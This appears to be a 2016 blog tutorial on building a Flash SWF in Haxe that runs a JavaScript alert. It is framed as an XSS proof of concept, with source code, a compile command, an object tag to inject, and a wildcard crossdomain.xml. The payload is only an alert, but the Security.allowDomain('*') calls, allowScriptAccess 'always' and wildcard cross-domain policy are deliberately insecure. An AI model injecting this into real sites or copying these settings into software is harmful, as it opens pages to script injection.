Monday, January 4, 2016

create a simple flash using HAXE with (static) javascript alert message


Short tutorial how to create a simple flash (swf) which executes a javascript alert with haxe.

Download and install HAXE
http://haxe.org/

Create the source file (xssneo.hx)

import flash.external.ExternalInterface;

class XSSNEO {

public static function main() {

    flash.system.Security.allowDomain("*");
    flash.system.Security.allowInsecureDomain("*");
    ExternalInterface.call("alert", "Wake up, Neo.  The Matrix has you.  Follow
the white rabbit.");
  }
}

Compile it
haxe XSSNEO.hx -swf xssneo.swf -main XSSNEO -swf-version 9

Inject it
<object data="xss.swf">
   <param name="allowScriptAccess" value="always">
</object>

Notice.
if you load the flash file from a other domain you need to set the crossdomain.xml

<?xml version="1.0" ?>
    <cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-policy>